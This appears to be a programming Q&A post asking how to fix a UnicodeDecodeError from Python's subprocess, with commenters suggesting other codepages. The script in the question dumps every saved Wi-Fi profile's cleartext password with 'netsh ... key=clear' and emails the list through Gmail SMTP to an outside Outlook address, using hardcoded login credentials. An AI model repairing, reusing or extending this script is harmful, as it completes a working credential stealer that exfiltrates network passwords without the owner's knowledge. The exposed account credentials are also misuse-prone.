# subproces.check_output().decode() gives UnicodeDecodeError: 'utf-8' codec can't decode byte 0x83 in position 604: invalid start byte

Tags: python, utf-8, subprocess, decode

I am trying to retrieve some date using the subprocess model but keeps getting the above error. after looking up i found out that the character at that position was 'â'. I tried other decoding methods like charmap and latin-1, it didnt give me the error but the output str was 'L\x83ayoune' it returns the position of the char instead of the char it self.
the line that gives the error : data = subprocess.check_output(['netsh', 'wlan', 'show', 'profiles']).decode('utf-8')

```
import subprocess
import smtplib


data = subprocess.check_output(['netsh', 'wlan', 'show', 'profiles']).decode('utf-8').split('\n')
print(data)
wifis = [line.split(':')[1][1:-1] for line in data if "All User Profile" in line]
msg = ''


print(wifis)


for wifi in wifis:
    resultes = subprocess.check_output(['netsh', 'wlan', 'show', 'profiles', wifi, 'key=clear'], 
stderr=subprocess.STDOUT).decode('utf-8').split('\n')
    resultes = [line.split(':')[1][1:-1] for line in resultes if 'Key Content' in line]
    try:
        print(f"Name : {wifi}, Password : {resultes[0]}")
        msg += f"Name : {wifi}, Password : {resultes[0]}"
    except IndexError:
        print(f"Name : {wifi} Password : Not Accessible")
        msg += f"Name : {wifi} Password : Not Accessible\n"


with smtplib.SMTP('smtp.gmail.com', 587) as smtp:
    smtp.ehlo()
    smtp.starttls()
    smtp.ehlo()
    smtp.login('adamdemofighter@gmail.com', 'hamzaelbahlaoui')
    smtp.sendmail('adamdemofighter@gmail.com', 'hamza.el.bahlaoui@outlook.com', msg)
```

Comment: The `… invalid start byte` error means that input isn't `UTF-8`. The byte value `b'\x83'` is  the `â` character (`\u00E2` _Latin Small Letter A With Circumflex_) in more encodings e.g. `b'\x83'.decode('cp437')` or `b'\x83'.decode('cp850')` etc.

Comment: yes i know, so any solution to the problem or good decoding methods ?

Comment: I'd try `.decode(sys.stdout.encoding)`.

Comment: didnt workout still giving me the same issue.